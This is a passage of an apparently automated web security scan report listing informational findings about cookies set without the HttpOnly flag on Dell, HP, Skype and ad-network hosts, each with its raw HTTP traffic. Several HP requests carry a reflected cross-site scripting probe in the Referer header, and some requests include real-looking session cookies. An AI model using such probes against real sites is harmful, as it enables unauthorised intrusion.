GET /m2/dellinc/mbox/standard?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153150925-582363&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=2&mbox=enus_create&mboxId=0&mboxTime=1315135150965&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40&mboxXDomainCheck=true HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315153150925-582363.19; Domain=dellinc.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 16:19:15 GMT; Path=/m2/dellinc
Content-Type: text/javascript
Content-Length: 166
Date: Sun, 04 Sep 2011 16:19:14 GMT
Server: Test & Target

mboxFactories.get('default').get('enus_create',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315153150925-582363.19");

11.45. http://eas.apm.emediate.eu/eas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eas.apm.emediate.eu
Path:   /eas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eas?camp=65585;cu=21949;cre=mu;js=y;target=_blank;ord=[timestamp];EASClick= HTTP/1.1
Host: eas.apm.emediate.eu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:57 GMT
Server: Apache/2.2.16 (Debian)
Cache-Control: no-cache, must-revalidate
Expires: Thu, 18 May 2006 01:00:00 GMT
P3P: CP="NOI DSP COR PSAo PSDo BUS OUR"
Set-Cookie: eas_ret=1:1:xAQ+4gX; path=/; expires=Mon, 16-Mar-20 01:00:00 GMT;
Vary: Accept-Encoding,User-Agent
Content-Length: 628
Connection: close
Content-Type: application/x-javascript; charset=ISO-8859-1

document.writeln("<scr"+"ipt language=\"JavaScript1.1\" src=\"http:\/\/ad-emea.doubleclick.net\/adj\/N5072.133384.ADPEPPERNETWORK\/B5476869.4;sz=728x90;pc=[TPAS_ID];ord=1315187697;click=http:\/\/gacel
...[SNIP]...

11.46. http://gacela.eu/bb/mrcsrc/getpixel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gacela.eu
Path:   /bb/mrcsrc/getpixel.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bb/mrcsrc/getpixel.php?db=1241&ai=1234&si=4321&z=1315187696 HTTP/1.1
Host: gacela.eu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Last-Modified: Mon, 05 Sep 2011 01:55:01 GMT
Expires: 0
Pragma: no-cache
Cache-Control: private, no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
P3P: href="http://gacela.eu/bb/w3c/p3p.xml", CP="NON CURa DEVa OUR STP UNI COM NAV INT"
X-Server: nurago38
Set-Cookie: APE=fbbe990cb7dc37e8e4c76082421f7fdb%3B2%3B%3BI-0-0-0%3BP-0-0-0%3BX-0-0-0%3BZ-0-0-1315187701%3B1241-2-0-1315187701%3B1234-2-0-1315187701; expires=Sat, 03-Mar-2012 01:55:01 GMT; path=/; domain=gacela.eu
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

11.47. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /subchoice/country/us/en/subhub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:31:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-us; path=/
Set-Cookie: cc=us; path=/
Set-Cookie: hp_xp=; expires=Mon, 05-Sep-2011 00:31:08 GMT; path=/; secure
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_htmlTag" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...

11.48. http://h30187.www3.hp.com/is/233e5e7671/p/productId/104921/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/233e5e7671/p/productId/104921/eventType/PDV/puid/999999b/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/233e5e7671/p/productId/104921/eventType/PDV/puid/999999b/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:49 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.49. http://h30187.www3.hp.com/is/3569c10978/p/productId/104920/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/3569c10978/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/3569c10978/p/productId/104920/eventType/PDV/puid/999999b/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:50 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.50. http://h30187.www3.hp.com/is/3af2f4399a/p/productId/104918/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/3af2f4399a/p/productId/104918/eventType/PDV/puid/999999b/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/3af2f4399a/p/productId/104918/eventType/PDV/puid/999999b/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:49 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.51. http://h30187.www3.hp.com/is/6b0543035d/p/productId/104922/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/6b0543035d/p/productId/104922/eventType/PDV/puid/999999b/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/6b0543035d/p/productId/104922/eventType/PDV/puid/999999b/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:50 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851;PATH=/
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.52. http://h30187.www3.hp.com/is/778ee93a0e/p/productId/104919/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/778ee93a0e/p/productId/104919/eventType/PDV/puid/999999b/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/778ee93a0e/p/productId/104919/eventType/PDV/puid/999999b/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:49 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512;PATH=/
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.53. http://h30187.www3.hp.com/is/99bcf3130c/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/99bcf3130c/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/99bcf3130c/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:49 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512;PATH=/
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.54. http://h30187.www3.hp.com/is/fdee7fcaf7/p/productId/104931/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/fdee7fcaf7/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/fdee7fcaf7/p/productId/104931/eventType/PDV/puid/999999b/i.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:49 GMT
expires: 0
pragma: no-cache
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

11.55. http://h30187.www3.hp.com/resources/images/email-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/images/email-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/images/email-icon.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:50 GMT
ETag: "B7pzd2ErmET"
Last-Modified: Tue, 30 Aug 2011 21:22:40 GMT
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851;PATH=/
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 70
Connection: keep-alive

GIF89a..........3f!.......,.......................|.......GVS...[..;

11.56. http://h30187.www3.hp.com/resources/images/print.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/images/print.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/images/print.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:48 GMT
ETag: "B7pzd2ErmEr"
Last-Modified: Tue, 30 Aug 2011 21:22:40 GMT
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 94
Connection: keep-alive

GIF89a..........3f......!.......,........./..(......>..>..{q.f.X...g._.v%..#...L..~..x.D...;

11.57. http://h30187.www3.hp.com/resources/images/s.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/images/s.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/images/s.gif HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:43:47 GMT
ETag: "B7pzd2ErmD4"
Last-Modified: Tue, 30 Aug 2011 21:22:40 GMT
Server: nginx
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512;PATH=/
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

11.58. http://h30434.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30434.www3.hp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: h30434.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1417999999; Domain=.www3.hp.com; Expires=Thu, 04-Sep-2014 09:58:51 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link cl
...[SNIP]...

11.59. https://login.skype.com/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
